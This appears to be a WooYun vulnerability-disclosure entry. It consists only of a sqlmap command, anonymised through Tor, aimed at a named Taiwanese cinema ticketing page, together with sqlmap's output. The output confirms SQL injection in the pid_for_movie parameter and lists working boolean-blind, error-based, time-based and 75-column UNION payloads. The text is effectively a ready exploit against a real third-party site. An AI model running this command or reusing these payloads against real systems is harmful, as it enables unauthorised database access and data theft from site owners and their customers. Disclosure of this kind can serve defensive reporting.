WooYun.org

./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --threads 2 --technique=BEUT -u "https://tienmou.woviecinemas.com.tw/ticket_wovie.php?pid_for_movie=430" --dbs
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: pid_for_movie (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid_for_movie=430 AND 5050=5050
    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: pid_for_movie=430 AND ROW(2680,4822)>(SELECT COUNT(*),CONCAT(0x7170626271,(SELECT (ELT(2680=2680,1))),0x71707a6a71,FLOOR(RAND(0)*2))x FROM (SELECT 6046 UNION SELECT 5052 UNION SELECT 7419 UNION SELECT 7588)a GROUP BY x)
    Type: AND/OR time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: pid_for_movie=430 AND 7536=BENCHMARK(20000000,MD5(0x776e6f41))
    Type: UNION query
    Title: MySQL UNION query (NULL) - 75 columns
    Payload: pid_for_movie=430 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170626271,0x45716a53725161544c78,0x71707a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---